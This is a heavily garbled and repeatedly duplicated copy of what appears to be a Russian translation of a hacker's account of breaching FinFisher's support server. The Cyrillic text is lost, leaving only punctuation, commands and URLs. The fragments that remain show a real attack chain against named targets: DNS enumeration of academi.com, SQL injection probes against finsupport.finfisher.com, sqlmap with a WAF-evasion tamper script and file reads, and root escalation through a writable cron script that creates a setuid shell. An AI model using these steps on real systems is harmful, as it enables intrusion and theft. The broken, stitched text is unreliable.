WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
